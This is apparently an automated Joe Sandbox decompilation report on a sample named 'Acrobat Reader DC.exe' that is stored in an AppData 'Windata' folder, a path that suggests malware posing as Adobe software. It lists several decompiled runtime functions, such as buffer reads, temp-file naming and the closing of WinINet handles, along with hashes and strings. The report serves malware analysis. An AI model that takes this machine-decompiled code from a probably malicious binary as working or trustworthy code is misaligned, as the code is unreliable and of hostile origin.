                                  • Instruction ID: ae18a0e6088bde325f2b8f87e65bbb2aaade0ee39655e70765b31d945e00dc0b
                                  • Opcode Fuzzy Hash: 7e754992b260b6e72dbf0ba7770114a121c02481734c5380321d1baa9379aa27
                                  • Instruction Fuzzy Hash: 7B0122B390010CABD700DF5AEC41E9B77A8EB84300F00412BFA08D7241EB31EA52C7E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E004321A4(intOrPtr _a4, signed int* _a8) {
                                  				signed char _v5;
                                  				signed char _v6;
                                  				signed char _v7;
                                  				signed int _v8;
                                  				char _v12;
                                  				signed int _t21;
                                  				intOrPtr _t39;
                                  
                                  				_t39 = _a4;
                                  				if( *((intOrPtr*)(_t39 + 0x14)) != 1) {
                                  					E00414D04( &_v12, 1, 8,  *((intOrPtr*)(_t39 + 0x1c)));
                                  				} else {
                                  					E00410E60( &_v12,  *((intOrPtr*)(_t39 + 0xc)) +  *((intOrPtr*)(_t39 + 4)), 8);
                                  				}
                                  				 *((intOrPtr*)(_t39 + 0xc)) =  *((intOrPtr*)(_t39 + 0xc)) + 8;
                                  				 *_a8 = (((_v8 & 0x000000ff) << 0x00000008 | _v7 & 0x000000ff) << 0x00000008 | _v6 & 0x000000ff) << 0x00000008 | _v5 & 0x000000ff;
                                  				_v8 = 0;
                                  				_t21 = E00414D30( &_v12, "EA06");
                                  				asm("sbb eax, eax");
                                  				return  ~( ~_t21);
                                  			}











                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: __fread_nolock_memmove
                                  • String ID: EA06
                                  • API String ID: 1988441806-3962188686
                                  • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                  • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                  • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                  • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00442BB4(void* __ebx, void* __fp0, intOrPtr* _a4, char _a8) {
                                  				signed int _t7;
                                  				void* _t12;
                                  				signed int* _t17;
                                  				intOrPtr _t19;
                                  				void* _t21;
                                  				intOrPtr* _t22;
                                  
                                  				_t1 =  &_a8; // 0x442c75
                                  				_t7 =  *_t1 & 0x0000ffff;
                                  				_t22 = _a4;
                                  				_t20 = _t22 + 8;
                                  				_t17 = _t22 + 8;
                                  				_t19 = 0x11;
                                  				do {
                                  					_t7 = 1 - _t7 * 0x53a9b4fb;
                                  					 *_t17 = _t7;
                                  					_t17 =  &(_t17[1]);
                                  					_t19 = _t19 - 1;
                                  					_t25 = _t19;
                                  				} while (_t19 != 0);
                                  				 *_t22 = _t19;
                                  				 *((intOrPtr*)(_t22 + 4)) = 0xa;
                                  				E00410E60(_t22 + 0x4c, _t20, 0x44);
                                  				E00410E60(_t22 + 0x90, _t20, 0x44);
                                  				_t21 = 9;
                                  				do {
                                  					_t12 = E00431EC8(_t25, __fp0, _t22);
                                  					st0 = __fp0;
                                  					_t21 = _t21 - 1;
                                  				} while (_t21 != 0);
                                  				return _t12;
                                  			}










                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: u,D
                                  • API String ID: 4104443479-3858472334
                                  • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                  • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                  • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                  • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044CDE9(void* __eflags, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                  				intOrPtr* _t26;
                                  				intOrPtr* _t35;
                                  				intOrPtr* _t36;
                                  
                                  				_t26 = _a12;
                                  				_t36 = _a8;
                                  				_t35 = _a4;
                                  				E004013C0( *(_t35 + 4) +  *((intOrPtr*)(_t26 + 4)), _t36, __eflags);
                                  				E00410E60( *_t36,  *_t35,  *(_t35 + 4) +  *(_t35 + 4));
                                  				E00410E60( *_t36 +  *(_t35 + 4) * 2,  *_t26,  *((intOrPtr*)(_t26 + 4)) + 1 +  *((intOrPtr*)(_t26 + 4)) + 1);
                                  				 *((intOrPtr*)(_t36 + 4)) =  *(_t35 + 4) +  *((intOrPtr*)(_t26 + 4));
                                  				return _t36;
                                  			}







                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _memmove
                                  • String ID: Error:
                                  • API String ID: 4104443479-232661952
                                  • Opcode ID: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                  • Instruction ID: e6e9f2aa443a554b8bda50df2a041f2c42dbd20d32390c21629c974d0e28b4a3
                                  • Opcode Fuzzy Hash: 47c0561e29c226fab9e20f11d30fc4033f42905d42d91430649e8e798f40a5ad
                                  • Instruction Fuzzy Hash: 2101EFB6200115ABC704DF49D981D6AF7A9FF88710708855AF819CB302D774FD20CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00442651(char _a4) {
                                  				void** _t10;
                                  
                                  				_t1 =  &_a4; // 0x426561
                                  				_t10 =  *_t1;
                                  				InternetCloseHandle(_t10[1]);
                                  				InternetCloseHandle( *_t10);
                                  				 *_t10 = 0;
                                  				_t10[1] = 0;
                                  				return E004319AC( &(_t10[0x35]), 0x2710);
                                  			}





                                  APIs
                                  • InternetCloseHandle.WININET(?), ref: 00442663
                                  • InternetCloseHandle.WININET ref: 00442668
                                    • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseHandleInternet$ObjectSingleWait
                                  • String ID: aeB
                                  • API String ID: 857135153-906807131
                                  • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                  • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                  • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                  • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00433244(intOrPtr _a4, intOrPtr _a8, char _a12) {
                                  				void* _t8;
                                  				void* _t10;
                                  				intOrPtr _t13;
                                  				signed int _t14;
                                  
                                  				_t1 =  &_a12; // 0x425e09
                                  				_t14 =  *_t1;
                                  				_t13 = _a4;
                                  				if(_t14 != 0) {
                                  					_t10 = E00412FBA(_t13, _a8, _t14 - 1);
                                  					 *((short*)(_t13 + _t14 * 2 - 2)) = 0;
                                  					return _t10;
                                  				}
                                  				return _t8;
                                  			}








                                  APIs
                                  Strings
                                  • ^B, xrefs: 00433248
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 0043324B
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _wcsncpy
                                  • String ID: ^B$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 1735881322-2741327645
                                  • Opcode ID: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                  • Instruction ID: 95fca152a805ab331260cabc3645652019b64b11bc5d0d7a1f408bc65d2df1f2
                                  • Opcode Fuzzy Hash: f7c3fd886c497ae33bdd3057849675e3afdb83c7c480df0bc310b3c11edf5eb4
                                  • Instruction Fuzzy Hash: ADE0C23360051A7B9710DE4AD841DBBF37DEEC4A20B08802AF90883200E2B1BD1A43E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00431E1F(WCHAR* _a4) {
                                  				short _v528;
                                  
                                  				GetTempPathW(0x104,  &_v528);
                                  				return GetTempFileNameW( &_v528, L"aut", 0, _a4);
                                  			}





                                  APIs
                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                  • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00431E4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Temp$FileNamePath
                                  • String ID: aut
                                  • API String ID: 3285503233-3010740371
                                  • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                  • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                  • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                  • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                  Uniqueness

                                  Uniqueness Score: -1.00%